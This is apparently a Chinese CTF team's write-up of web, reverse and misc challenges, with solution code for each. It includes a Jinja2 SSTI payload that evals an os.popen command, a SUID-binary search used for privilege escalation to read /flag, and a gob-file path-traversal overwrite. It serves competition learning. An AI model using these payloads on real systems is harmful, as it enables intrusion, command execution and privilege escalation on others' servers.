1manity’s WriteUp
随便写了点,没写多清楚,(一整个懒住QWQ)
队伍名称
1manity
排名
13名
解题思路
WEB
象棋王子
简单游戏题
找到胜利的逻辑,控制台运行
电子木鱼
rust整数溢出
Cost 扣 10 功德,乘上 1073741824 就溢出了,负的 i32 变成正的 i32 了。就不多说了
BabyGo
gob反序列化+沙箱逃逸
生成gob文件
package main
import (
"encoding/gob"
"fmt"
"os"
)
// User is the record that main gob-encodes into user.gob.
type User struct {
	Name  string // set to "ctfer" by main
	Path  string // set by main to a /tmp/<hex>/ directory path (trailing slash included)
	Power string // set to "admin" by main
}
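// main writes one gob-encoded User record to ./user.gob in the working
// directory.
//
// Fixes against the original: the OpenFile error was discarded and Close was
// then deferred on a possibly-nil *os.File (nil dereference on failure), and
// O_RDWR|O_CREATE without O_TRUNC left trailing bytes of a larger
// pre-existing user.gob in place. os.Create truncates and uses 0666 (masked
// by umask) instead of a world-executable 0777 data file.
func main() {
	fmt.Println("Hello World")
	userDir := "/tmp/b1a6761e169cd3774fa99ebfc114aa29/"
	info := User{Name: "ctfer", Path: userDir, Power: "admin"}
	name := "user.gob"

	file, err := os.Create(name)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer file.Close()

	if err := gob.NewEncoder(file).Encode(info); err != nil {
		fmt.Println(err)
	}
}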
压缩包上传后,解压时 path 传参 ../,把 user.gob 解压到上级目录覆盖
go沙箱逃逸,找到文章了,一模一样的
https://www.ctfiot.com/55141.html
REVERSE
PZGalaxy
这不也是web嘛。。。
F12打开看到关键代码,然后爆破一下。直接放控制台就跑完了
/**
 * RC4 stream cipher over JavaScript strings: every char code of `p` is
 * XORed with one keystream byte derived from `k`. Because XOR is an
 * involution, the same call encrypts and decrypts.
 *
 * Keystream bytes are < 256, so only the low byte of each char code is
 * affected; higher bits pass through unchanged.
 *
 * @param {string} k key; `k.length` is used as a modulus, so it must be non-empty
 * @param {string} p plaintext or ciphertext
 * @returns {string} one output character per input character
 */
function Leaf(k, p) {
  // Key scheduling: start from the identity permutation and shuffle it
  // with the key bytes.
  const box = Array.from({ length: 256 }, (_, n) => n);
  let jdx = 0;
  for (let idx = 0; idx < 256; idx++) {
    jdx = (jdx + box[idx] + k.charCodeAt(idx % k.length)) % 256;
    [box[idx], box[jdx]] = [box[jdx], box[idx]];
  }

  // Pseudo-random generation: one keystream byte per character.
  const out = [];
  let a = 0;
  let b = 0;
  for (let pos = 0; pos < p.length; pos++) {
    a = (a + 1) % 256;
    b = (b + box[a]) % 256;
    [box[a], box[b]] = [box[b], box[a]];
    const ks = box[(box[a] + box[b]) % 256];
    out.push(String.fromCharCode(p.charCodeAt(pos) ^ ks));
  }
  return out.join('');
}
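/**
 * Brute-forces the date-shaped RC4 key "2023" + NNNN against the captured
 * ciphertext and prints the first decryption whose first four characters
 * are "flag".
 *
 * The counter runs to 114514, but padStart never truncates, so for
 * i >= 10000 the key is 9 characters long and the `date.length == 8`
 * test rejects it: only 20230000..20239999 are effectively tried. That
 * bound is kept as the author wrote it.
 *
 * Fixes against the original: str1, str2 and flag were assigned without a
 * declaration (implicit globals, a ReferenceError under strict mode), and
 * the 37-element ciphertext array was rebuilt and joined on every one of
 * the ~115k iterations; it is now built once outside the loop.
 */
function f() {
  // Captured ciphertext, one element per character; loop-invariant.
  const enc = ['¦', 'p', ':', 'Ü', '\x92', 'Ã', '\x97', 'ó', '\x1A', 'ß', '\b', 'Ö', 'A', ' ', '5', '\x90', '{', '\x06', 'Ô', '÷', 's', '_', '\x1D', ':', 'I', 'L', 'C', 'X', 'Ñ', '¹', 'O', '\x99', '\x85', '3', 'à', 'i', '|'].join('');
  for (let i = 0; i <= 114514; i++) {
    const date = "2023" + i.toString().padStart(4, '0');
    const flag = Leaf(date, enc);
    if (flag.substring(0, 4) == "flag" && date.length == 8 && date.substring(0, 4) == "2023") {
      console.log(flag);
      break;
    }
  }
}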
// Run the brute force immediately when pasted into the console.
f();
exp 请粘贴代码,不允许截图。
MISC
验证码
根据提示tupper塔珀自指公式
Snake on web
几分钟秒了,没想到是一血。。。
import time
import keyboard
# alt+tab presumably brings the game window to the front — TODO confirm.
keyboard.press_and_release("alt+tab")
# Repeat the same four key presses forever with the original pauses
# (short after "s", long after "a"/"d"); the keys are presumably WASD
# movement, which this script does not verify.
while True:
    for key, pause in (("s", 0.1), ("a", 1.8), ("s", 0.1), ("d", 1.8)):
        keyboard.press_and_release(key)
        time.sleep(pause)
直接遍历地图,玩会手机flag就到手了
LSSTIB
很web的misc,LSB隐写加SSTI加SUID提权,题目本身提示全了
# -*- coding: UTF-8 -*-
from PIL import Image
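def getHideString(hide_string):
    """Return the bytes of file *hide_string* as a string of '0'/'1' characters.

    Each byte becomes exactly eight characters (most significant bit first),
    so the result has ``8 * filesize`` characters and the LSB encoder can
    split it back into bytes.

    Args:
        hide_string: path of the file to read (a path, despite the name).

    Returns:
        The bit string, empty for an empty file.

    Fixes against the original: bytes >= 0x80 produced nine characters
    (``bin()`` lost its ``b`` but kept the leading ``0``, and ``zfill(8)``
    pads but never truncates), shifting every later bit; and the handle was
    never closed (``f.closed`` reads an attribute, it does not call close).
    """
    # bytearray yields ints on both Python 2 and 3, so no ord() is needed.
    with open(hide_string, "rb") as f:
        payload = bytearray(f.read())
    return "".join(format(byte, "08b") for byte in payload)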
def mod(x, y):
    """Return ``x`` modulo ``y`` with the sign rules of the ``%`` operator."""
    remainder = divmod(x, y)[1]
    return remainder
#original_file为载体图片路径,hide_string为隐写文件,new_file为加密图片保存的路径
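def encode(original_file, hide_string, new_file):
    """Hide the bytes of file *hide_string* in the pixel LSBs of *original_file*.

    The message bits (see ``getHideString``) are written one per channel in
    R, G, B order, scanning rows top to bottom and pixels left to right. A
    pixel is rewritten only when at least one of its channels was touched,
    so pixels after the end of the message keep their original values.

    Args:
        original_file: path of the carrier image; every pixel must expose at
            least three channels (RGB / RGBA), which is not checked.
        hide_string: path of the file whose contents are embedded (a path,
            despite the name).
        new_file: path the stego image is saved to.

    Raises:
        ValueError: if the message has more bits than the image has R/G/B
            channels; the original silently truncated the message instead.

    Changes against the original: ``print`` uses call syntax so the script
    also runs on Python 3; both loops stop once the message is written
    instead of spinning through every remaining row; the capacity check
    replaces silent truncation.
    """
    im = Image.open(original_file)
    width, height = im.size
    print("width:" + str(width) + "\n")
    print("height:" + str(height) + "\n")

    key = getHideString(hide_string)
    keylen = len(key)
    capacity = 3 * width * height
    if keylen > capacity:
        raise ValueError(
            "message needs %d bits but the image only holds %d" % (keylen, capacity)
        )

    count = 0  # index of the next bit of ``key`` to embed
    for h in range(height):
        if count == keylen:
            break
        for w in range(width):
            if count == keylen:
                break
            channels = list(im.getpixel((w, h))[:3])
            for idx in range(3):
                if count == keylen:
                    break
                # Clear the LSB (value - value % 2) and put the message bit there.
                channels[idx] = channels[idx] - mod(channels[idx], 2) + int(key[count])
                count += 1
            im.putpixel((w, h), tuple(channels))
    im.save(new_file)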
# Carrier image (input).
original_file = "Projectile1-export.png"
# Where the stego image is written.
new_file = "Projectile1-export.png-stego.png"
# File whose bytes get embedded (a path, despite the name).
hide_string = "4.txt"
# Runs at import time: the script is meant to be executed directly.
encode(original_file=original_file, hide_string=hide_string, new_file=new_file)
网上找的脚本,官方的SSTI payload
suid提权
# List every regular file with the set-uid bit; permission-denied noise is discarded.
find / -type f -perm -4000 2>/dev/null
{# Jinja2 SSTI chain: scans object's subclass list for catch_warnings, reaches the builtins through that class's __init__ globals and eval()s an os.popen() call, whose output is rendered into the page. This only triggers when user-controlled text is used as the template source; keeping user input as template *data* (never as the template string) removes the vector. #}
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('find lsb.py -exec cat /flag \;').read()")}}
{% endif %}
{% endfor %}
🐮